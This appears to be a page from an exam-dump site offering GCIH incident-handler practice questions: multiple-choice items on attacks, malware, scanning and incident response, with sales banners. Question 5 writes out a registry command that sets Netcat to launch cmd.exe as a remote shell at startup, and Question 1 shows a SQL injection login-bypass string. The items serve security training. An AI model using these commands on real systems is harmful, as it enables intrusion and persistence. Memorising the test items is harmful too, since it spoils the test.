Easter Sale Special 65% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: exams65

GIAC Certified Incident Handler Question and Answers

GIAC Certified Incident Handler

Last Update May 18, 2024
Total Questions : 328

We are offering FREE GCIH GIAC exam questions. All you do is to just go and sign up. Give your details, prepare GCIH free exam questions and then go for complete pool of GIAC Certified Incident Handler test questions that will help you more.

GCIH pdf

GCIH PDF

$35  $99.99
GCIH Engine

GCIH Testing Engine

$42  $119.99
GCIH PDF + Engine

GCIH PDF + Testing Engine

$56  $159.99
Questions 1

John works as a professional Ethical Hacker. He has been assigned a project to test the security of www.we-are-secure.com. On the We-are-secure login page, he enters ='or''=' as a username and successfully logs in to the user page of the Web site.

The we-are-secure login page is vulnerable to a __________.

Options:

A.  

Dictionary attack

B.  

SQL injection attack

C.  

Replay attack

D.  

Land attack

Discussion 0
Questions 2

Which of the following malicious software travels across computer networks without the assistance of a user?

Options:

A.  

Worm

B.  

Virus

C.  

Hoax

D.  

Trojan horses

Discussion 0
Questions 3

Which of the following DoS attacks affects mostly Windows computers by sending corrupt UDP packets?

Options:

A.  

Fraggle

B.  

Ping flood

C.  

Bonk

D.  

Smurf

Discussion 0
Questions 4

You work as a Network Administrator for Tech Perfect Inc. The company has a TCP/IP-based network. An attacker uses software that keeps trying password combinations until the correct password is found. Which type of attack is this?

Options:

A.  

Denial-of-Service

B.  

Man-in-the-middle

C.  

Brute Force

D.  

Vulnerability

Discussion 0
Questions 5

You run the following command on the remote Windows server 2003 computer:

c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe"

What task do you want to perform by running this command?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.  

You want to perform banner grabbing.

B.  

You want to set the Netcat to execute command any time.

C.  

You want to put Netcat in the stealth mode.

D.  

You want to add the Netcat command to the Windows registry.

Discussion 0
Questions 6

Which of the following statements are true about a keylogger?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.  

It records all keystrokes on the victim's computer in a predefined log file.

B.  

It can be remotely installed on a computer system.

C.  

It is a software tool used to trace all or specific activities of a user on a computer.

D.  

It uses hidden code to destroy or scramble data on the hard disk.

Discussion 0
Questions 7

John works as a professional Ethical Hacker. He has been assigned a project to test the security of www.we-are-secure.com. He performs Web vulnerability scanning on the We-are-secure server. The output of the scanning test is as follows:

C:\whisker.pl -h target_IP_address

-- whisker / v1.4.0 / rain forest puppy / www.wiretrip.net -- = - = - = - = - =

= Host: target_IP_address

= Server: Apache/1.3.12 (Win32) ApacheJServ/1.1

mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.22

+ 200 OK: HEAD /cgi-bin/printenv

John recognizes /cgi-bin/printenv vulnerability ('Printenv' vulnerability) in the We_are_secure server. Which of the following statements about 'Printenv' vulnerability are true?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.  

This vulnerability helps in a cross site scripting attack.

B.  

'Printenv' vulnerability maintains a log file of user activities on the Website, which may be useful for the attacker.

C.  

The countermeasure to 'printenv' vulnerability is to remove the CGI script.

D.  

With the help of 'printenv' vulnerability, an attacker can input specially crafted links and/or other malicious scripts.

Discussion 0
Questions 8

Fill in the blank with the appropriate name of the attack.

______ takes best advantage of an existing authenticated connection

Options:

Discussion 0
Questions 9

Which of the following Denial-of-Service (DoS) attacks employ IP fragmentation mechanism?

Each correct answer represents a complete solution. Choose two.

Options:

A.  

Land attack

B.  

SYN flood attack

C.  

Teardrop attack

D.  

Ping of Death attack

Discussion 0
Questions 10

Which of the following statements are true about tcp wrappers?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.  

tcp wrapper provides access control, host address spoofing, client username lookups, etc.

B.  

When a user uses a TCP wrapper, the inetd daemon runs the wrapper program tcpd instead of running the server program directly.

C.  

tcp wrapper allows host or subnetwork IP addresses, names and/or ident query replies, to be used as tokens to filter for access control purposes.

D.  

tcp wrapper protects a Linux server from IP address spoofing.

Discussion 0
Questions 11

In which of the following malicious hacking steps does email tracking come under?

Options:

A.  

Reconnaissance

B.  

Gaining access

C.  

Maintaining Access

D.  

Scanning

Discussion 0
Questions 12

Which of the following can be used to perform session hijacking?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.  

Cross-site scripting

B.  

Session fixation

C.  

ARP spoofing

D.  

Session sidejacking

Discussion 0
Questions 13

You work as an Incident handling manager for a company. The public relations process of the company includes an event that responds to the e-mails queries. But since few days, it is identified that this process is providing a way to spammers to perform different types of e-mail attacks. Which of the following phases of the Incident handling process will now be involved in resolving this process and find a solution?

Each correct answer represents a part of the solution. Choose all that apply.

Options:

A.  

Eradication

B.  

Contamination

C.  

Preparation

D.  

Recovery

E.  

Identification

Discussion 0
Questions 14

You work as a Security Administrator for Net Perfect Inc. The company has a Windows-based network. You want to use a scanning technique which works as a reconnaissance attack. The technique should direct to a specific host or network to determine the services that the host offers.

Which of the following scanning techniques can you use to accomplish the task?

Options:

A.  

IDLE scan

B.  

Nmap

C.  

SYN scan

D.  

Host port scan

Discussion 0
Questions 15

Victor works as a professional Ethical Hacker for SecureEnet Inc. He has been assigned a job to test an image, in which some secret information is hidden, using Steganography. Victor performs the following techniques to accomplish the task:

1. Smoothening and decreasing contrast by averaging the pixels of the area where significant color transitions occurs.

2. Reducing noise by adjusting color and averaging pixel value.

3. Sharpening, Rotating, Resampling, and Softening the image.

Which of the following Steganography attacks is Victor using?

Options:

A.  

Stegdetect Attack

B.  

Chosen-Stego Attack

C.  

Steg-Only Attack

D.  

Active Attacks

Discussion 0
Questions 16

You want to perform passive footprinting against we-are-secure Inc. Web server. Which of the following tools will you use?

Options:

A.  

Nmap

B.  

Ethereal

C.  

Ettercap

D.  

Netcraft

Discussion 0
Questions 17

Which of the following attacks are examples of Denial-of-service attacks (DoS)?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.  

Fraggle attack

B.  

Smurf attack

C.  

Birthday attack

D.  

Ping flood attack

Discussion 0
Questions 18

In which of the following methods does an hacker use packet sniffing to read network traffic between two parties to steal the session cookies?

Options:

A.  

Cross-site scripting

B.  

Physical accessing

C.  

Session fixation

D.  

Session sidejacking

Discussion 0
Questions 19

You work as a Network Administrator for Marioxnet Inc. You have the responsibility of handling two routers with BGP protocol for the enterprise's network. One of the two routers gets flooded with an unexpected number of data packets, while the other router starves with no packets reaching it. Which of the following attacks can be a potential cause of this?

Options:

A.  

Packet manipulation

B.  

Denial-of-Service

C.  

Spoofing

D.  

Eavesdropping

Discussion 0
Questions 20

Which of the following is the process of comparing cryptographic hash functions of system executables and configuration files?

Options:

A.  

Shoulder surfing

B.  

File integrity auditing

C.  

Reconnaissance

D.  

Spoofing

Discussion 0
Questions 21

Which of the following types of malware can an antivirus application disable and destroy?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.  

Rootkit

B.  

Trojan

C.  

Crimeware

D.  

Worm

E.  

Adware

F.  

Virus

Discussion 0
Questions 22

You discover that your network routers are being flooded with broadcast packets that have the return address of one of the servers on your network. This is resulting in an overwhelming amount of traffic going back to that server and flooding it. What is this called?

Options:

A.  

Syn flood

B.  

Blue jacking

C.  

Smurf attack

D.  

IP spoofing

Discussion 0
Questions 23

Which of the following systems is used in the United States to coordinate emergency preparedness and incident management among various federal, state, and local agencies?

Options:

A.  

US Incident Management System (USIMS)

B.  

National Disaster Management System (NDMS)

C.  

National Emergency Management System (NEMS)

D.  

National Incident Management System (NIMS)

Discussion 0
Questions 24

Which of the following types of attacks is often performed by looking surreptitiously at the keyboard or monitor of an employee's computer?

Options:

A.  

Buffer-overflow attack

B.  

Shoulder surfing attack

C.  

Man-in-the-middle attack

D.  

Denial-of-Service (DoS) attack

Discussion 0
Questions 25

You work as a Network Administrator in the SecureTech Inc. The SecureTech Inc. is using Linux-based server. Recently, you have updated the password policy of the company in which the server will disable passwords after four trials. What type of attack do you want to stop by enabling this policy?

Options:

A.  

Brute force

B.  

Replay

C.  

XSS

D.  

Cookie poisoning

Discussion 0
Questions 26

Which of the following keyloggers cannot be detected by anti-virus or anti-spyware products?

Options:

A.  

Kernel keylogger

B.  

Software keylogger

C.  

Hardware keylogger

D.  

OS keylogger

Discussion 0
Questions 27

Which of the following is a reason to implement security logging on a DNS server?

Options:

A.  

For preventing malware attacks on a DNS server

B.  

For measuring a DNS server's performance

C.  

For monitoring unauthorized zone transfer

D.  

For recording the number of queries resolved

Discussion 0
Questions 28

Which of the following is the best method of accurately identifying the services running on a victim host?

Options:

A.  

Use of the manual method of telnet to each of the open ports.

B.  

Use of a port scanner to scan each port to confirm the services running.

C.  

Use of hit and trial method to guess the services and ports of the victim host.

D.  

Use of a vulnerability scanner to try to probe each port to verify which service is running.

Discussion 0
Questions 29

Buffer overflows are one of the major errors used for exploitation on the Internet today. A buffer overflow occurs when a particular operation/function writes more data into a variable than the variable was designed to hold.

Which of the following are the two popular types of buffer overflows?

Each correct answer represents a complete solution. Choose two.

Options:

A.  

Dynamic buffer overflows

B.  

Stack based buffer overflow

C.  

Heap based buffer overflow

D.  

Static buffer overflows

Discussion 0
Questions 30

John, a part-time hacker, has accessed in unauthorized way to the www.yourbank.com banking Website and stolen the bank account information of its users and their credit card numbers by using the SQL injection attack. Now, John wants to sell this information to malicious person Mark and make a deal to get a good amount of money. Since, he does not want to send the hacked information in the clear text format to Mark; he decides to send information in hidden text. For this, he takes a steganography tool and hides the information in ASCII text by appending whitespace to the end of lines and encrypts the hidden information by using the IDEA encryption algorithm. Which of the following tools is John using for steganography?

Options:

A.  

Image Hide

B.  

2Mosaic

C.  

Snow.exe

D.  

Netcat

Discussion 0
Questions 31

John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He finds that the We-are-secure server is vulnerable to attacks. As a countermeasure, he suggests that the Network Administrator should remove the IPP printing capability from the server. He is suggesting this as a countermeasure against __________.

Options:

A.  

IIS buffer overflow

B.  

NetBIOS NULL session

C.  

SNMP enumeration

D.  

DNS zone transfer

Discussion 0
Questions 32

Adam works as an Incident Handler for Umbrella Inc. His recent actions towards the incident are not up to the standard norms of the company. He always forgets some steps and procedures while handling responses as they are very hectic to perform.

Which of the following steps should Adam take to overcome this problem with the least administrative effort?

Options:

A.  

Create incident manual read it every time incident occurs.

B.  

Appoint someone else to check the procedures.

C.  

Create incident checklists.

D.  

Create new sub-team to keep check.

Discussion 0
Questions 33

Which of the following tools can be used to perform brute force attack on a remote database?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.  

SQLBF

B.  

SQLDict

C.  

FindSA

D.  

nmap

Discussion 0
Questions 34

An attacker sends a large number of packets to a target computer that causes denial of service.

Which of the following type of attacks is this?

Options:

A.  

Spoofing

B.  

Snooping

C.  

Phishing

D.  

Flooding

Discussion 0
Questions 35

Victor is a novice Ethical Hacker. He is learning the hacking process, i.e., the steps taken by malicious hackers to perform hacking. Which of the following steps is NOT included in the hacking process?

Options:

A.  

Scanning

B.  

Preparation

C.  

gaining access

D.  

Reconnaissance

Discussion 0
Questions 36

Which of the following provides packet-level encryption between hosts in a LAN?

Options:

A.  

PPTP

B.  

IPsec

C.  

PFS

D.  

Tunneling protocol

Discussion 0
Questions 37

Which of the following protocols uses only User Datagram Protocol (UDP)?

Options:

A.  

POP3

B.  

FTP

C.  

ICMP

D.  

TFTP

Discussion 0
Questions 38

John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He wants to perform a stealth scan to discover open ports and applications running on the We-are-secure server. For this purpose, he wants to initiate scanning with the IP address of any third party. Which of the following scanning techniques will John use to accomplish his task?

Options:

A.  

RPC

B.  

IDLE

C.  

UDP

D.  

TCP SYN/ACK

Discussion 0
Questions 39

You want to connect to your friend's computer and run a Trojan on it. Which of the following tools will you use to accomplish the task?

Options:

A.  

PSExec

B.  

Remoxec

C.  

Hk.exe

D.  

GetAdmin.exe

Discussion 0
Questions 40

Which of the following is used by attackers to obtain an authenticated connection on a network?

Options:

A.  

Denial-of-Service (DoS) attack

B.  

Replay attack

C.  

Man-in-the-middle attack

D.  

Back door

Discussion 0
Questions 41

Which of the following is used to gather information about a remote network protected by a firewall?

Options:

A.  

Warchalking

B.  

Wardialing

C.  

Firechalking

D.  

Firewalking

Discussion 0
Questions 42

John is a malicious attacker. He illegally accesses the server of We-are-secure Inc. He then places a backdoor in the We-are-secure server and alters its log files. Which of the following steps of malicious hacking includes altering the server log files?

Options:

A.  

Maintaining access

B.  

Covering tracks

C.  

Gaining access

D.  

Reconnaissance

Discussion 0
Questions 43

Which of the following programs is used for bypassing normal authentication for securing remote access to a computer?

Options:

A.  

Backdoor

B.  

Worm

C.  

Adware

D.  

Spyware

Discussion 0
Questions 44

John works as a Network Security Professional. He is assigned a project to test the security of

www.we-are-secure.com. He establishes a connection to a target host running a Web service with netcat and sends a bad html request in order to retrieve information about the service on the host.

Which of the following attacks is John using?

Options:

A.  

Sniffing

B.  

Eavesdropping

C.  

War driving

D.  

Banner grabbing

Discussion 0
Questions 45

Your IDS discovers that an intruder has gained access to your system. You immediately stop that access, change passwords for administrative accounts, and secure your network. You discover an odd account (not administrative) that has permission to remotely access the network. What is this most likely?

Options:

A.  

An example of privilege escalation.

B.  

A normal account you simply did not notice before. Large networks have a number of accounts; it is hard to track them all.

C.  

A backdoor the intruder created so that he can re-enter the network.

D.  

An example of IP spoofing.

Discussion 0
Questions 46

Session splicing is an IDS evasion technique in which an attacker delivers data in multiple small-sized packets to the target computer. Hence, it becomes very difficult for an IDS to detect the attack signatures of such attacks. Which of the following tools can be used to perform session splicing attacks?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.  

Whisker

B.  

Fragroute

C.  

Nessus

D.  

Y.A.T.

Discussion 0
Questions 47

Which of the following is the method of hiding data within another media type such as graphic or document?

Options:

A.  

Spoofing

B.  

Steganography

C.  

Packet sniffing

D.  

Cryptanalysis

Discussion 0
Questions 48

Which of the following are based on malicious code?

Each correct answer represents a complete solution. Choose two.

Options:

A.  

Denial-of-Service (DoS)

B.  

Biometrics

C.  

Trojan horse

D.  

Worm

Discussion 0
Questions 49

Which of the following Trojans is used by attackers to modify the Web browser settings?

Options:

A.  

Win32/FlyStudio

B.  

Trojan.Lodear

C.  

WMA/TrojanDownloader.GetCodec

D.  

Win32/Pacex.Gen

Discussion 0